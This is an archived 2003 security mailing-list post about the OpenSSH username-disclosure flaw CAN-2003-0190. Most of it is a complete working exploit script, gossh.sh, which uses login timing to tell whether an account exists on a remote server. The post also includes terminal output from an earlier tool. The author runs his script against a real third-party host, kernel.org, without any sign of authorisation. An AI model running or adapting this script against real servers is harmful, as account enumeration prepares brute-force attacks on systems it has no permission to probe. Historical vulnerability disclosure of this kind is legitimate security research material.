lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: nc at stormvault.net (Nicolas Couture) Subject: CAN-2003-0190 - OpenSSH <= 3.6.1p1 After my --- experience --- bash-2.05a$ ./a.out SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved Usage: ./a.out <protocol version> <user file> <host> bash-2.05a$ echo root > file bash-2.05a$ ./a.out 2 file 0 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved Testing an illegal user : sh: ./ssh: No such file or directory sh: ./ssh: No such file or directory sh: ./ssh: No such file or directory 127 second(s) Testing login root : sh: ./ssh: No such file or directory ILLEGAL [127 second(s)] bash-2.05a$ cp `which ssh` . bash-2.05a$ ./a.out 2 file 0 SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved Testing an illegal user : not_val_user@0's password: # here I had to type enter manually (????) Permission denied, please try again. not_val_user@0's password: # and so here as well as all other password prompts Permission denied, please try again. not_val_user@0's password: Permission denied (publickey,password,keyboard-interactive). not_val_user@0's password: Permission denied, please try again. not_val_user@0's password: Permission denied, please try again. not_val_user@0's password: Permission denied (publickey,password,keyboard-interactive). not_val_user@0's password: Permission denied, please try again. not_val_user@0's password: Permission denied, please try again. not_val_user@0's password: Permission denied (publickey,password,keyboard-interactive). 255 second(s) Testing login root : root@0's password: Permission denied, please try again. root@0's password: Permission denied, please try again. root@0's password: Permission denied (publickey,password,keyboard-interactive). ILLEGAL [255 second(s)] bash-2.05a$ --- experience --- with ssh_brute.c from mediaservice.net who released, lately, an advisory for OpenSSH <= 3.6.1p1 that became CAN-2003-0190 (http://lab.mediaservice.net/advisory/2003-01-openssh.txt) I decided to write my own working exploit: --- gossh.sh --- #!/bin/sh # OpenSSH <= 3.6.p1 - User Identification. # Nicolas Couture - nc@...rmvault.net # # Description: # -Tells you wether or not a user exist on # a distant server running OpenSSH. # # Usage: # -You NEED to have the host's public key # before executing this script. # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# # Fact Sheet: # # o It is really accurate against # # redhat boxes. # # o Linux boxes running grsecurity # # has 10 seconds delay on both # # valid AND invalid user login # # attempts. # # o *BSD boxes are not vulnerables and # # always has 10 seconds delay like # # Linux-Grsec + network protection # # # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# # History: # # Thu May 1 15:41:18 EDT 2003 # # ; Script started. # # Thu May 1 16:42:30 EDT 2003 # # ; Script is functional. # #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=# # Let the user know how we work. usage(){ echo "$0 <user> <host>" exit 1 } # Verify the arguments. [ $# != 2 ] && usage # Variables. USER="$1" HOST="$2" #=-=-=-=-=-=-=-=-=-=-=-=-=# # Expect script functions # #=-=-=-=-=-=-=-=-=-=-=-=-=# # Expect script for password. expasswd() { cat << EOF > expasswd spawn $SSHCMD expect password: send '\r' interact EOF } # Expect script for error. experror() { cat << EOF > experror spawn expect -f expasswd expect again. exit 1593 interact EOF } #=-=-=-=-=-=-=-=-=-=# # -Fake user timing # #=-=-=-=-=-=-=-=-=-=# # OpenSSH client command for inexisting user. export SSHCMD="ssh nicolas_couture@...ST" # Build new expect script. expasswd experror # Timing. FDATE0=`date '+%s'` echo "[-] Calculating fake user timeout..." expect -f experror 1> /dev/null 2> /dev/null FDATE1=`date '+%s'` # Fake user timeout. FUTO=`echo $FDATE1 - $FDATE0 | bc` echo "[+] Found $FUTO." #=-=-=-=-=-=-=-=# # -$USER timing # #=-=-=-=-=-=-=-=# # OpenSSH command. export SSHCMD="ssh $USER@...ST" # Build new expect scripts. expasswd experror DATE0=`date '+%s'` echo "[-] Calculating $USER timeout on $SERVER..." expect -f experror 1> /dev/null 2> /dev/null DATE1=`date '+%s'` # $USER timeout. END=`echo $DATE1 - $DATE0 | bc` echo "[+] Found $END." #=-=-=-=-=# # -Result # #=-=-=-=-=# if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then echo "This box is not vulnerable." exit 1 fi # Use of our magic skills. if [ "$FUTO" -lt "$END" ]; then echo "$USER exist on $HOST." elif [ "$FUTO" -ge "$END" ]; then echo "$USER doesn't exist on $HOST." else echo "Segmentation fault." exit 13 fi # Remove tmp files. rm -rf expasswd experror # EOF --- gossh.sh --- Interesting things you can find with this script... --- snip --- bash-2.05a$ ./gossh.sh linux kernel.org [-] Calculating fake user timeout... [+] Found 1. [-] Calculating linux timeout on kernel.org... [+] Found 1. linux doesn't exist on kernel.org. bash-2.05a$ finger linux@...nel.org The latest stable version of the Linux kernel is: 2.4.20 The latest prepatch for the stable Linux kernel tree is: 2.4.21-rc1 The latest beta version of the Linux kernel is: 2.5.68 The latest snapshot for the beta Linux kernel tree is: 2.5.68-bk11 The latest 2.2 version of the Linux kernel is: 2.2.25 The latest 2.0 version of the Linux kernel is: 2.0.39 The latest prepatch for the 2.0 Linux kernel tree is: 2.0.40-rc6 The latest -ac patch to the stable Linux kernels is: 2.4.21-rc1-ac3 The latest -ac patch to the beta Linux kernels is: 2.5.67-ac2 The latest -dj patch to the beta Linux kernels is: 2.5.60-dj2 --- snip --- This is a sign that the finger daemon has been hacked by some kernel.org people :) Links: -http://lab.mediaservice.net/advisory/2003-01-openssh.txt -http://lab.mediaservice.net/code/ssh_brute.c
Powered by blists - more mailing lists